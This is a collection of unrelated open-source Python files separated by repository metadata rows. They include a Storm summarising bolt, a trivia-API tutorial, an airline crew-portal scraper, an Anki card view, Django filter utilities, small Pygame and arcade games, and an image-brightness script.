            # NOTE(review): the board redraw and label blit happen once per
            # *event*, not per frame -- confirm this is intended.
            game.update()
            WINDOW.blit(text, (10, 10))
        game.update()
        pygame.time.delay(10)
    # Keep the final board on screen for 10 s before quitting.
    pygame.time.delay(10000)
    pygame.quit()
if __name__ == '__main__':
    main()
| mh022396/Checkers-AI | src/main.py | main.py | py | 2,616 | python | en | code | 0 | github-code | 13 |
33259281187 | """Take a document that has a key values: list<int> and add the following keys
* total: the sum of all the values
* count: how many values
"""
import copy
import random
from streamparse import bolt
class SummariseBolt(bolt.Bolt):
    """Storm bolt that enriches incoming documents with 'total'/'count' keys.

    Acking is manual (``auto_ack = False``) so that the simulated transient
    failures below are retried by the topology instead of being lost.
    """
    # Manual ack/fail: failed tuples are replayed by Storm.
    auto_ack = False
    def process(self, tup):
        self.log(u"Received: {0}".format(tup))
        # Randomly fail ~1 in 4 tuples.
        if random.choice([1, 2, 3, 4]) == 1:
            # This is to simulate a failure that we should retry. E.g. a host
            # being temporarily down etc.
            self.log(u"Failing: {0}".format(tup))
            self.fail(tup)
            return
        # The document is the first (and only) value of the tuple.
        document = tup.values[0]
        self.log(u"Summarising: {0}".format(document))
        if not document.get("values"):
            # This is a failure from which we can not recover. So we don't
            # fail it, we just log and continue.
            self.log(u"Bad Document! No values")
        else:
            document_with_summary = summarise(document)
            next_tuple = (document_with_summary, )
            self.log(u"Done with original tuple: {0}".format(tup.id))
            self.emit(next_tuple)
            # NOTE(review): the ack is inside the else-branch, so bad
            # documents are never acked and Storm will replay them after the
            # tuple timeout -- confirm this matches the "log and continue"
            # intent above.
            self.ack(tup)
def summarise(original_document):
    """Summarises a document by totaling and counting the values.
    >>> summarise({"values": [1, 2, 3]})
    {'count': 3, 'total': 6, 'values': [1, 2, 3]}
    """
    # Work on a deep copy so the caller's document is never mutated.
    summarised = copy.deepcopy(original_document)
    vals = summarised["values"]
    summarised.update(total=sum(vals), count=len(vals))
    return summarised
| sujaymansingh/sparse_average | src/summarise.py | summarise.py | py | 1,517 | python | en | code | 1 | github-code | 13 |
36026572854 | """
main transfer protocol used in the web
Javascript object Notation (JSON): an object converted to string
similar to dictionary in Python
1. client prepares request
2. client sends HTTP request
3. Server recieves request and looks for data
4. Server sends back response
.get()
.post()
basics of https requests
"""
# Import the HTTP client library.
import requests

# Send a GET request (Open Trivia DB: 5 easy multiple-choice questions).
r = requests.get(
    "https://opentdb.com/api.php?amount=5&category=13&difficulty=easy&type=multiple"
)
# Show the HTTP status code (200 == OK).
print(r.status_code)
# BUGFIX: a bare expression does nothing in a script -- print the body.
print(r.text)
# The raw body is a JSON *string* at this point.
print(type(r.text))
# json is part of the standard library.
import json
# Convert the JSON string into a Python dictionary.
question = json.loads(r.text)
# BUGFIX: the original re-checked ``r.text`` here; inspect the parsed object.
print(type(question))
# pprint is also part of the standard library (no extra install needed).
import pprint
pprint.pprint(question)
# Grab a specific value and show it.
print(question["results"][2]["category"])
| triggxl/Python3 | 04-requests.py | 04-requests.py | py | 877 | python | en | code | 0 | github-code | 13 |
19214605660 | import requests
import dict_users
import time
from bs4 import BeautifulSoup
import pytz
from datetime import datetime, timedelta
import exception_logger
# Snapshot "now" once at import time as a 'DD.MM.YYYY HH:MM' string.
# NOTE(review): time.strftime returns *local* time, but the value is tagged
# as UTC below -- confirm the host runs in the intended timezone.
current_datetime = time.strftime('%d.%m.%Y %H:%M')
# Parse the formatted string back into a timezone-aware datetime (UTC label).
dt_utc_arrive = datetime.strptime(current_datetime, '%d.%m.%Y %H:%M').replace(tzinfo=pytz.utc)
# Shift four hours into the past (UTC-to-UTC astimezone is a no-op here).
dt_minus_4h = dt_utc_arrive.astimezone(pytz.utc) - timedelta(hours=4)
day = dt_minus_4h.strftime('%d')
month = dt_minus_4h.strftime('%m')
year = dt_minus_4h.strftime('%Y')  # NOTE(review): unused in the visible code
hour = dt_minus_4h.strftime('%H')
minute = dt_minus_4h.strftime('%M')
# Compact 'DD.MM HH:MM' representation of the shifted timestamp.
current_dt_minus_4h = f'{day}.{month} {hour}:{minute}'
def parser():  # wrapped in a function so it can be called as module.function() after import
    """Log in to the airline crew portal and fetch the duty-plan table.

    Returns
    -------
    None on network failure or (currently) on success — the row-parsing
    logic is still unfinished, see the TODO at the bottom; an error string
    when the plan table cannot be found (e.g. wrong credentials).
    """
    # The module is hard-wired to a single Telegram user for now.  Naming the
    # id once here also fixes the NameError the old code raised in both
    # error paths, which referenced an undefined `user_id`.
    user_id = 157758328
    url = 'https://edu.rossiya-airlines.com/ops/viewLineOps-1/'
    s = requests.Session()
    data = {
        'refer': 'https://edu.rossiya-airlines.com//',
        'login': '1',
        'user_id': '',
        'backend_url': 'https://sup.rossiya-airlines.com:8080',
        'username': dict_users.users[user_id]['tab_number'],
        'userpass': dict_users.users[user_id]['password'],
        'domain': 'stc.local',
        'submit': 'войти'
    }
    try:
        radar = s.post(url, data=data, headers=dict(Referer=url))
        print(radar)
    except Exception as exc:  # e.g. ConnectionResetError(10054) when the remote host drops the link
        exception_logger.writer(exc=exc, request=url, user_id=dict_users.users[user_id])
        return
    soup = BeautifulSoup(radar.content, 'html.parser')
    radar.close()
    # soup.select returns a ResultSet (a list of Tags); it has no .text of its
    # own, so the old debug `print(events.text)` crashed on every run.
    events = soup.select('.table.table-striped.table-hover.table-bordered.sorting3.dataTable.no-footer')
    try:
        table = events[0]
    except Exception as exc:
        # No plan table in the page: most likely the login form was returned.
        error = f"Проблема с получением "
        exception_logger.writer(exc=exc, request='парсинг плана', user_id=dict_users.users[user_id],
                                answer='неверный логин и пароль')
        return error
    tbody = table.contents[1]
    rows = tbody.contents
    output_info = 'Ваш ближайший план работ:\n'
    # TODO: finish the per-row parsing (flight number, departure time shifted
    # into the user's preferred time zone, etc.).  `rows` and `output_info`
    # above are prepared for that loop; the previous draft lived here as a
    # large commented-out block and has been removed.
    return
# NOTE(review): this runs at import time as well as when executed directly;
# consider guarding with `if __name__ == '__main__':` if import-time side
# effects are not wanted.
parser()
| azarovdimka/python | telebot/opensky_radar.py | opensky_radar.py | py | 4,338 | python | ru | code | 1 | github-code | 13 |
22477365648 | from pygame import *
from animations import *
class trainer():
    """Player-controlled trainer sprite.

    Tracks position/size, the movement flags set by the input handler, and
    the tick counter driving the walk animation.
    """
    def __init__(self, x, y, width, height):
        # Pos. attributes
        self.x = x
        self.y = y
        self.width = width
        self.height = height
        self.vel = 5  # movement speed, pixels per tick
        # Attributes for walk direction (set/cleared by the game loop)
        self.left = False
        self.right = False
        self.up = False
        self.down = False
        self.walkCount = 0  # animation tick; frame index is walkCount // 3

    def draw(self, win):
        """Blit the animation frame matching the current movement direction.

        Bug fix: the counter reset used to be the FIRST branch of the
        if/elif chain, so on every 12th tick nothing was drawn at all
        (a one-frame flicker while walking).  Resetting first and then
        choosing the frame draws on every tick.
        """
        walkComplement = 3  # divisor of the walkCount index: each frame is held 3 ticks
        if self.walkCount + 1 >= 12:
            self.walkCount = 0
        if self.right:
            win.blit(playerAnimations.walkMCRight[self.walkCount // walkComplement], (self.x, self.y))
            self.walkCount += 1
        elif self.left:
            win.blit(playerAnimations.walkMCLeft[self.walkCount // walkComplement], (self.x, self.y))
            self.walkCount += 1
        elif self.up:
            win.blit(playerAnimations.walkMCUp[self.walkCount // walkComplement], (self.x, self.y))
            self.walkCount += 1
        elif self.down:
            win.blit(playerAnimations.walkMCDown[self.walkCount // walkComplement], (self.x, self.y))
            self.walkCount += 1
        else:
            # standing still: face the last pressed direction, defaulting to
            # the generic standing pose
            if self.right:
                win.blit(playerAnimations.standingMCseries[3], (self.x, self.y))
            elif self.up:
                win.blit(playerAnimations.standingMCseries[1], (self.x, self.y))
            elif self.down:
                win.blit(playerAnimations.standingMCseries[0], (self.x, self.y))
            else:
                win.blit(playerAnimations.standingMCseries[2], (self.x, self.y))
6142009976 | import microgp4 as ugp
def test_make_shared_parameter():
    """Shared parameters must mirror each other's value, while distinct
    shared classes built from the same base stay independent."""
    base_parameters = [
        ugp.f.integer_parameter(0, 10_000_000),
        ugp.f.float_parameter(0, 1.0),
        ugp.f.choice_parameter(range(10_000)),
        ugp.f.array_parameter("01X", 256),
    ]
    for base in base_parameters:
        Shared = ugp.f.make_shared_parameter(base)
        first, second = Shared(), Shared()
        assert first.value == second.value
        before_mutation = first.value
        first.mutate(1)
        # mutating one instance is visible through the other
        assert first.value == second.value
        assert first.value != before_mutation
        # a second shared class from the same base is a separate group
        OtherShared = ugp.f.make_shared_parameter(base)
        third = OtherShared()
        previous = third.value
        third.mutate()
        assert third.value != previous
        assert first.value != third.value
        assert second.value != third.value
| microgp/microgp4 | test/microgp4/framework/_test_shared.py | _test_shared.py | py | 954 | python | en | code | 27 | github-code | 13 |
73539328338 | import numpy as np
import learning
import random
import time
# Class labels come from the learning module so that the data loader and
# the classifier agree on the label encoding.
positiveLabel = learning.positiveLabel
negativeLabel = learning.negativeLabel
# Path to the Wisconsin Diagnostic Breast Cancer dataset (comma-separated).
data = "../common/cancer/wdbc.data"
def main():
    """Run the full experiment: load the data, train, and report metrics."""
    started = time.time()
    X, Y = load_data()
    classifier, iters, error, (precision, recall, f1) = learning.learn(X, Y)
    print("Best L: {0}".format(iters))
    print("Test set error: {0}".format(error))
    print("Precision: {0}".format(precision))
    print("Recall: {0}".format(recall))
    print("F1 score: {0}".format(f1))
    print("Done working in {0} seconds".format(time.time() - started))
def load_data(path=None):
    """Read the WDBC csv, shuffle the rows, and split into features/labels.

    Parameters
    ----------
    path : str, optional
        File to read; defaults to the module-level ``data`` path.

    Returns
    -------
    (xs, ys) : list of numpy feature vectors, list of class labels.
    """
    if path is None:
        path = data
    # `with` closes the file deterministically; the old `for line in open(...)`
    # leaked the file handle.
    with open(path, "r") as f:
        lines = f.readlines()
    random.shuffle(lines)
    xs, ys = [], []
    for line in lines:
        tokens = line.split(",")
        # column 1 is the diagnosis: 'M' (malignant) vs 'B' (benign)
        y = positiveLabel if tokens[1] == 'M' else negativeLabel
        # columns 2+ are the real-valued features
        x = np.array(list(map(float, tokens[2:])))
        xs.append(x)
        ys.append(y)
    return xs, ys
main() | anton-bannykh/ml-2013 | artem.vasilyev/lab4-logistic/main.py | main.py | py | 1,009 | python | en | code | 4 | github-code | 13 |
24511360921 | from PyQt4.QtGui import *
from PyQt4.QtCore import *
import anki, anki.utils
from anki.sound import playFromText, stripSounds
from anki.latex import renderLatex, stripLatex
from anki.utils import stripHTML
from anki.hooks import runHook, runFilter
import types, time, re, os, urllib, sys, difflib
from ankiqt import ui
from ankiqt.ui.utils import mungeQA, getBase
from anki.utils import fmtTimeSpan
from PyQt4.QtWebKit import QWebPage, QWebView
failedCharColour = "#FF0000"
passedCharColour = "#00FF00"
futureWarningColour = "#FF0000"
# Views - define the way a user is prompted for questions, etc
##########################################################################
class View(object):
    "Handle the main window update as we transition through various states."
    # NOTE: this is Python 2 / PyQt4 era code (unicode/types.UnicodeType,
    # SIGNAL-based connections); keep that in mind when editing.
    def __init__(self, parent, body, frame=None):
        # parent is the main window; body is the QWebView showing the card
        self.main = parent
        self.body = body
        self.frame = frame
        self.main.connect(self.body, SIGNAL("loadFinished(bool)"),
                          self.onLoadFinished)
    # State control
    ##########################################################################
    def setState(self, state):
        "Change to STATE, and update the display."
        self.oldState = getattr(self, 'state', None)
        self.state = state
        if self.state == "initial":
            return
        elif self.state == "noDeck":
            self.clearWindow()
            self.drawWelcomeMessage()
            self.flush()
            return
        self.redisplay()
    def redisplay(self):
        "Idempotently display the current state (prompt for question, etc)"
        if self.state == "noDeck" or self.state == "studyScreen":
            return
        self.clearWindow()
        # whether a top section (last card / early-review warning) is shown
        self.haveTop = (self.main.lastCard and (
            self.main.config['showLastCardContent'] or
            self.main.config['showLastCardInterval'])) or (
            self.needFutureWarning())
        # whether to draw an <hr> between question and answer
        self.drawRule = (self.main.config['qaDivider'] and
                         self.main.currentCard and
                         not self.main.currentCard.cardModel.questionInAnswer)
        if not self.main.deck.isEmpty():
            if self.haveTop:
                self.drawTopSection()
            if self.state == "showQuestion":
                self.setBackground()
                self.drawQuestion()
                if self.drawRule:
                    self.write("<hr>")
            elif self.state == "showAnswer":
                self.setBackground()
                if not self.main.currentCard.cardModel.questionInAnswer:
                    self.drawQuestion(nosound=True)
                if self.drawRule:
                    self.write("<hr>")
                self.drawAnswer()
        elif self.state == "deckEmpty":
            self.drawWelcomeMessage()
        elif self.state == "deckFinished":
            self.drawDeckFinishedMessage()
        self.flush()
    def addStyles(self):
        # card styles
        s = "<style>\n"
        if self.main.deck:
            s += self.main.deck.css
        s += "div { white-space: pre-wrap; }"
        s += "</style>"
        return s
    def clearWindow(self):
        # reset both the rendered page and the pending HTML buffer
        self.body.setHtml("")
        self.buffer = ""
    def setBackground(self):
        # use the card model's last font colour as the page background
        col = self.main.currentCard.cardModel.lastFontColour
        self.write("<style>html { background: %s;}</style>" % col)
    # Font properties & output
    ##########################################################################
    def flush(self):
        "Write the current HTML buffer to the screen."
        self.buffer = self.addStyles() + self.buffer
        # hook for user css
        runHook("preFlushHook")
        self.buffer = '''<html><head>%s</head><body>%s</body></html>''' % (
            getBase(self.main.deck), self.buffer)
        #print self.buffer.encode("utf-8")
        self.body.setHtml(self.buffer)
    def write(self, text):
        # Python 2: coerce byte strings to unicode before appending
        if type(text) != types.UnicodeType:
            text = unicode(text, "utf-8")
        self.buffer += text
    # Question and answer
    ##########################################################################
    def center(self, str, height=40):
        # note: the `str` parameter shadows the built-in of the same name
        if not self.main.config['splitQA']:
            return "<center>" + str + "</center>"
        return '''\
<center><div style="display: table; height: %s%%; width:100%%; overflow: hidden;">\
<div style="display: table-cell; vertical-align: middle;">\
<div style="">%s</div></div></div></center>''' % (height, str)
    def drawQuestion(self, nosound=False):
        "Show the question."
        if not self.main.config['splitQA']:
            self.write("<br>")
        q = self.main.currentCard.htmlQuestion()
        if self.haveTop:
            height = 35
        else:
            height = 45
        q = runFilter("drawQuestion", q)
        self.write(self.center(self.mungeQA(self.main.deck, q), height))
        if self.state != self.oldState and not nosound:
            playFromText(q)
    def correct(self, a, b):
        # Build an HTML diff of the typed answer `b` against the correct
        # answer `a`, colouring matches and mismatches.
        if b == "":
            return "";
        ret = "";
        s = difflib.SequenceMatcher(None, b, a)
        sz = self.main.currentCard.cardModel.answerFontSize
        ok = "background: %s; color: #000; font-size: %dpx" % (
            passedCharColour, sz)
        bad = "background: %s; color: #000; font-size: %dpx;" % (
            failedCharColour, sz)
        for tag, i1, i2, j1, j2 in s.get_opcodes():
            if tag == "equal":
                ret += ("<span style='%s'>%s</span>" % (ok, b[i1:i2]))
            elif tag == "replace":
                # pad with spaces so the replacement lines up with the answer
                ret += ("<span style='%s'>%s</span>"
                        % (bad, b[i1:i2] + (" " * ((j2 - j1) - (i2 - i1)))))
            elif tag == "delete":
                ret += ("<span style='%s'>%s</span>" % (bad, b[i1:i2]))
            elif tag == "insert":
                ret += ("<span style='%s'>%s</span>" % (bad, " " * (j2 - j1)))
        return ret
    def drawAnswer(self):
        "Show the answer."
        a = self.main.currentCard.htmlAnswer()
        a = runFilter("drawAnswer", a)
        if self.main.currentCard.cardModel.typeAnswer:
            try:
                cor = stripHTML(self.main.currentCard.fact[
                    self.main.currentCard.cardModel.typeAnswer])
            except KeyError:
                # the configured type-answer field no longer exists; clear it
                self.main.currentCard.cardModel.typeAnswer = ""
                cor = ""
            if cor:
                given = unicode(self.main.typeAnswerField.text())
                res = self.correct(cor, given)
                a = res + "<br>" + a
        self.write(self.center('<span id=answer />'
                               + self.mungeQA(self.main.deck, a)))
        if self.state != self.oldState:
            playFromText(a)
    def mungeQA(self, deck, txt):
        txt = mungeQA(deck, txt)
        # hack to fix thai presentation issues
        if self.main.config['addZeroSpace']:
            txt = txt.replace("</span>", "​</span>")
        return txt
    def onLoadFinished(self):
        # after the page loads, jump to the answer anchor if configured
        if self.state == "showAnswer":
            if self.main.config['scrollToAnswer']:
                mf = self.body.page().mainFrame()
                mf.evaluateJavaScript("location.hash = 'answer'")
    # Top section
    ##########################################################################
    def drawTopSection(self):
        "Show previous card, next scheduled time, and stats."
        self.buffer += "<center>"
        self.drawFutureWarning()
        self.drawLastCard()
        self.buffer += "</center>"
    def needFutureWarning(self):
        # warn only when the current card is being reviewed noticeably early
        if not self.main.currentCard:
            return
        if self.main.currentCard.due <= time.time():
            return
        if self.main.currentCard.due - time.time() <= self.main.deck.delay0:
            return
        return True
    def drawFutureWarning(self):
        if not self.needFutureWarning():
            return
        self.write("<span style='color: %s'>" % futureWarningColour +
                   _("This card was due in %s.") % fmtTimeSpan(
            self.main.currentCard.due - time.time()) +
                   "</span>")
    def drawLastCard(self):
        "Show the last card if not the current one, and next time."
        if self.main.lastCard:
            if self.main.config['showLastCardContent']:
                if (self.state == "deckFinished" or
                    self.main.currentCard.id != self.main.lastCard.id):
                    # truncate question and answer to 50 chars for the summary
                    q = self.main.lastCard.question.replace("<br>", " ")
                    q = stripHTML(q)
                    if len(q) > 50:
                        q = q[:50] + "..."
                    a = self.main.lastCard.answer.replace("<br>", " ")
                    a = stripHTML(a)
                    if len(a) > 50:
                        a = a[:50] + "..."
                    s = "%s<br>%s" % (q, a)
                    s = stripLatex(s)
                    self.write('<span class="lastCard">%s</span><br>' % s)
            if self.main.config['showLastCardInterval']:
                if self.main.lastQuality > 1:
                    msg = _("Well done! This card will appear again in "
                            "<b>%(next)s</b>.") % \
                            {"next":self.main.lastScheduledTime}
                else:
                    msg = _("This card will appear again later.")
                self.write(msg)
            self.write("<br>")
    # Welcome/empty/finished deck messages
    ##########################################################################
    def drawWelcomeMessage(self):
        # static HTML with welcome:* links handled elsewhere by the main window
        self.main.mainWin.welcomeText.setText("""\
<h1>%(welcome)s</h1>
<p>
<table>
<tr>
<td width=50>
<a href="welcome:addfacts"><img src=":/icons/list-add.png"></a>
</td>
<td valign=middle><h1><a href="welcome:addfacts">%(add)s</a></h1>
%(start)s</td>
</tr>
</table>
<br>
<table>
<tr>
<td width=50>
<a href="welcome:back"><img src=":/icons/go-previous.png"></a>
</td>
<td valign=middle><h2><a href="welcome:back">%(back)s</a></h2></td>
</tr>
</table>""" % \
    {"welcome":_("Welcome to Anki!"),
     "add":_("Add Material"),
     "start":_("Start adding your own material."),
     "back":_("Back to Deck Browser"),
     })
    def drawDeckFinishedMessage(self):
        "Tell the user the deck is finished."
        self.main.mainWin.congratsLabel.setText(
            self.main.deck.deckFinishedMsg())
class AnkiWebView(QWebView):
    """Web view used for the main card area.

    Handles the standard copy shortcut itself and swallows drops so that
    dragged content does not replace the rendered card.
    """
    def __init__(self, *args):
        QWebView.__init__(self, *args)
        self.setObjectName("mainText")
    def keyPressEvent(self, evt):
        if evt.matches(QKeySequence.Copy):
            self.triggerPageAction(QWebPage.Copy)
            # we handled the shortcut: consume the event.  (Bug fix: the old
            # code called evt.accept() and then unconditionally evt.ignore(),
            # so the accept was always overridden and the event propagated.)
            evt.accept()
        else:
            # let the parent widget process any other key
            evt.ignore()
    def contextMenuEvent(self, evt):
        QWebView.contextMenuEvent(self, evt)
    def dropEvent(self, evt):
        # deliberately ignore drops onto the card area
        pass
| scout-zz/ankiqt | ankiqt/ui/view.py | view.py | py | 10,795 | python | en | code | 4 | github-code | 13 |
2872516640 | import math
from django.db.models import Max, Min
from shop.filters.filters import ManufacturerFilter, PriceFilter, DimensionFilter
# Maps a GET-parameter name to the Filter class that knows how to build a
# queryset condition for it.
filter_mapping = {
    'producer': ManufacturerFilter,
    'price': PriceFilter,
    'height': DimensionFilter,
    'width': DimensionFilter,
    'depth': DimensionFilter
}
def get_values_ranges(min_value, max_value, total_count):
    """Split [min_value, max_value] into ranges such as ['0-24', '25-49'].

    The number of ranges follows Sturges' rule (1 + 3.322*log10(n)) so the
    granularity scales with the number of objects.  The last range (or the
    only one, when the step degenerates to <= 1) always closes at
    ``max_value``.  Returns an empty list when ``total_count`` is falsy.
    """
    result = []
    if total_count:
        number_of_ranges = int(1 + 3.322 * math.log10(total_count))
        step = round((max_value - min_value) / number_of_ranges)
        for i in range(number_of_ranges):
            if i == number_of_ranges - 1 or step <= 1:
                # final (or degenerate) bucket: close the range at max_value
                result.append(f"{min_value}-{max_value}")
                break
            result.append(f"{min_value}-{min_value + step - 1}")
            min_value += step
    return result
def get_value_and_counts(object_list, values_list, value_name):
    """Pair each range in ``values_list`` with the number of objects in
    ``object_list`` whose ``value_name`` attribute falls inside it.

    :param object_list: queryset of objects carrying the attribute
    :param values_list: value ranges, e.g. ['200-400', '400-600', ...]
    :param value_name: name of the attribute the ranges describe
    :return: list of (value_range, count) tuples, or None when
             ``values_list`` is empty (matches the historic behaviour)
    """
    if not values_list:
        return None
    if not object_list:
        # nothing to count against: every range gets a zero
        return [(value_range, 0) for value_range in values_list]
    def count_for(value_range):
        condition = filter_mapping[value_name](
            {'name': value_name, 'value': value_range}
        ).build_filter_condition()
        return object_list.filter(condition).count()
    return [(value_range, count_for(value_range)) for value_range in values_list]
def get_filters(data: dict):
    """Build queryset filter conditions from the non-empty request params."""
    conditions = []
    for param, value in data.items():
        if value:
            filter_obj = filter_mapping[param]({'name': param, 'value': value})
            conditions.append(filter_obj.build_filter_condition())
    return conditions
def get_price_range(object_list):
    """Return the (lowest, highest) integer price found in ``object_list``."""
    highest = int(object_list.aggregate(Max('price'))['price__max'])
    lowest = int(object_list.aggregate(Min('price'))['price__min'])
    return lowest, highest
| slavkoBV/MebliLem | myshop/shop/filters/filters_utils.py | filters_utils.py | py | 2,131 | python | en | code | 1 | github-code | 13 |
21985738669 | import cv2
# Load the image
img = cv2.imread('Images/Mars_surface.pbm')
isize = img.shape  # image properties (rows, cols[, channels])
# NOTE(review): cv2.imread returns a 3-channel BGR array by default, so
# vPix / tauxHumidité below may be per-channel arrays rather than scalars —
# confirm the .pbm actually loads as single-channel.
vPixMax = 0
vPix = 0
compteur = 0
tauxHumidité = 0
# Sum all pixel values and count the pixels
for i in range(0, isize[0]):
    for j in range(0, isize[1]):
        vPix = vPix + img[i][j]
        compteur = compteur +1
    # NOTE(review): recomputed every outer iteration; only the final value
    # (total pixel count * 255) is used below.
    vPixMax = compteur *255
## Density principle: M / V ==> mean
tauxHumidité = vPix / vPixMax
print("TauxHumidité :", tauxHumidité)
cv2.imshow('Surface de Mars',img)
cv2.waitKey(0)
cv2.destroyAllWindows() | Eager31/Projet-ExoLife | MissionA2.py | MissionA2.py | py | 524 | python | fr | code | 0 | github-code | 13 |
18484735844 | import time
import arcade
from typing import List, Tuple
import constants as c
import mapdata
import player
import isometric
import ui
import turn
import interaction
from bot import create_bot
class Mouse(arcade.Sprite):
    """Custom cursor sprite replacing the hidden system pointer.

    Keeps three coordinate systems in sync: absolute position
    (center_x/center_y), position relative to the scrolled view origin
    (rel_x/rel_y), and the isometric tile under the cursor (e_x/e_y).
    """
    def __init__(self, window):
        super().__init__("assets/ui/cursor.png", c.SPRITE_SCALE)
        # small custom hit box so only the cursor tip collides with UI
        self._points = (-22.5, 22.5), (-22, 22.5), (-22, 22), (-22.5, 22)
        self.window = window
        # offset from the window's view origin, maintained by the setters
        self.rel_x = 0
        self.rel_y = 0
        # isometric tile coordinates, set by the window's on_mouse_motion
        self.e_x = 0
        self.e_y = 0
    def _get_center_x(self) -> float:
        """ Get the center x coordinate of the sprite. """
        return self._position[0]
    def _set_center_x(self, new_value: float):
        """ Set the center x coordinate of the sprite. """
        if new_value != self._position[0]:
            # remember the view-relative offset so the cursor can follow scrolls
            self.rel_x = new_value - self.window.view_x
            self.clear_spatial_hashes()
            self._point_list_cache = None
            self._position = (new_value, self._position[1])
            self.add_spatial_hashes()
            for sprite_list in self.sprite_lists:
                sprite_list.update_location(self)
    center_x = property(_get_center_x, _set_center_x)
    def _get_center_y(self) -> float:
        """ Get the center y coordinate of the sprite. """
        return self._position[1]
    def _set_center_y(self, new_value: float):
        """ Set the center y coordinate of the sprite. """
        if new_value != self._position[1]:
            self.rel_y = new_value - self.window.view_y
            self.clear_spatial_hashes()
            self._point_list_cache = None
            self._position = (self._position[0], new_value)
            self.add_spatial_hashes()
            for sprite_list in self.sprite_lists:
                sprite_list.update_location(self)
    center_y = property(_get_center_y, _set_center_y)
class TemporumWindow(arcade.Window):
    """
    The Game Window, This holds the view and any constant variables as this will always be the same object.
    """
    def __init__(self):
        super().__init__(c.SCREEN_WIDTH, c.SCREEN_HEIGHT, c.WINDOW_NAME, fullscreen=c.FULL_SCREEN)
        arcade.set_background_color(arcade.color.BLACK)
        # View data: the scroll offset of the camera, snapped to sprite pixels
        self._view_x = c.round_to_x(-c.SCREEN_WIDTH / 2, 5 * c.SPRITE_SCALE)
        self._view_y = c.round_to_x(-c.SCREEN_HEIGHT / 2, 5 * c.SPRITE_SCALE)
        # Mouse: hide the OS cursor and draw our own sprite instead
        self.set_mouse_visible(False)
        self.mouse = Mouse(self)
        # The Views
        self.game = GameView()
        self.title = TitleView()
        self.end = EndView()
        # Always start with the title
        self.show_view(self.title)
    def restart(self):
        """Reset global state and rebuild all views, returning to the title."""
        c.restart()
        self.game = GameView()
        self.title = TitleView()
        self.end = EndView()
        self.show_view(self.title)
    def show_end(self):
        # jump to the final cut-scene view
        self.show_view(self.end)
    def on_key_press(self, symbol: int, modifiers: int):
        # At all times the ESCAPE key will close the game.
        if symbol == arcade.key.ESCAPE:
            self.close()
        elif symbol == arcade.key.TAB:
            # TAB pauses and minimises the window
            self.show_view(PauseMenu())
            self.minimize()
    def on_mouse_motion(self, x: float, y: float, dx: float, dy: float):
        # keep the custom cursor sprite under the pointer ...
        self.mouse.center_x = c.round_to_x(self.view_x + x + self.mouse.width / 2, 3)
        self.mouse.center_y = c.round_to_x(self.view_y + y - self.mouse.height / 2, 3)
        # ... and track which isometric tile it is over
        y_mod = ((160 - c.FLOOR_TILE_THICKNESS) * c.SPRITE_SCALE)
        self.mouse.e_x, self.mouse.e_y = isometric.cast_from_iso(self.view_x + x, self.view_y + y + y_mod)
    @property
    def view_x(self):
        return self._view_x
    @view_x.setter
    def view_x(self, value):
        # moving the view also drags the cursor sprite along
        self._view_x = value
        self.mouse.center_x = value + self.mouse.rel_x
    @property
    def view_y(self):
        return self._view_y
    @view_y.setter
    def view_y(self, value):
        self._view_y = value
        self.mouse.center_y = value + self.mouse.rel_y
class PauseMenu(arcade.View):
    """Overlay view shown while the game is paused."""

    def on_draw(self):
        arcade.start_render()
        center_x = self.window.view_x + self.window.width / 2
        center_y = self.window.view_y + self.window.height / 2
        arcade.draw_text("GAME PAUSED. PRESS ANY KEY TO CONTINUE",
                         center_x, center_y,
                         arcade.color.WHITE, anchor_x="center", anchor_y="center",
                         align="center", font_size=24)

    def on_key_press(self, symbol: int, modifiers: int):
        # any key resumes the running game
        self.window.show_view(self.window.game)
class EndView(arcade.View):
    """Final cut-scene: a short slideshow that restarts the game when done."""
    def __init__(self):
        super().__init__()
        # narration text for each slide
        self.slides = ["You walk Through the Door into a dusty and dark hallway\n"
                       "Something moves in the dark in front of you.\n"
                       "A dark skinned man in his late 20's looks up at you\n"
                       "You couldn't see him due to his black clothing\n"
                       "'Who the Hell Are you?!' he shouts.\n"
                       "Press Any key To Continue.",
                       "Press Any key To Continue"]
        self.current_slide = 0
        # NOTE(review): more image slots than slides; the trailing None
        # entries are never reached with the current two slides — confirm.
        self.slide_images = [arcade.Sprite("assets/final_scene_hooded_figure.png", c.SPRITE_SCALE,
                                           center_x=c.SCREEN_WIDTH//2, center_y=c.SCREEN_HEIGHT//2-50*c.SPRITE_SCALE),
                             arcade.Sprite("assets/final_scene_demo_end.png", c.SPRITE_SCALE,
                                           center_x=c.SCREEN_WIDTH//2, center_y=c.SCREEN_HEIGHT//2-50*c.SPRITE_SCALE),
                             None, None]
        self.current_image = self.slide_images[self.current_slide]
    def on_show(self):
        # stop gameplay music, reset the viewport and rewind the slideshow
        c.stop_music()
        self.window.set_viewport(0, c.SCREEN_WIDTH, 0, c.SCREEN_HEIGHT)
        self.current_slide = 0
        self.current_image = self.slide_images[self.current_slide]
    def _advance(self):
        """Step to the next slide; after the last one, restart the game.

        Extracted so mouse and keyboard input share one implementation
        (the two handlers previously duplicated this logic verbatim).
        """
        self.current_slide += 1
        if self.current_slide < len(self.slides):
            self.current_image = self.slide_images[self.current_slide]
        else:
            self.window.restart()
    def on_mouse_press(self, x: float, y: float, button: int, modifiers: int):
        self._advance()
    def on_key_press(self, symbol: int, modifiers: int):
        self._advance()
    def on_draw(self):
        arcade.start_render()
        if self.current_image is not None:
            self.current_image.draw()
        current_text = self.slides[self.current_slide]
        arcade.draw_text(current_text, c.SCREEN_WIDTH//2, c.SCREEN_HEIGHT-75*c.SPRITE_SCALE, arcade.color.WHITE,
                         anchor_y='top', anchor_x='center', align='center', font_size=24)
class GameView(arcade.View):
    """
    The GameView is the real game, it is where the gameplay will take place.
    """
    def __init__(self):
        self.window: TemporumWindow
        super().__init__()
        # Turn System
        self.turn_handler = turn.TurnHandler([], self)
        # The Current Ai info
        self.current_ai = []
        # The player info
        self.player = player.Player(25, 25, self)
        self.turn_handler.new_action_handlers([self.player.action_handler])
        c.iso_append(self.player)
        c.set_player(self.player)
        # Map Handler
        self.map_handler = mapdata.MapHandler(self)
        self.map_handler.load_map()
        # Setting player grid now that the map_handler has been initialised.
        self.player.set_grid(self.map_handler.full_map)
        # Conversation Handler
        self.convo_handler = interaction.load_conversation()
        # Mouse Select
        self.select_tile = player.Select(0, 0)
        c.iso_append(self.select_tile)
        self.selected_tile: player.Selected = None
        self.action_tab = ui.ActionTab(self)
        # Ui Stuff
        self.ui_elements = arcade.SpriteList()
        self.tabs = (ui.TalkTab(self),)
        self.tabs[0].center_x = c.round_to_x(self.window.view_x + c.SCREEN_WIDTH // 2, 5 * c.SPRITE_SCALE)
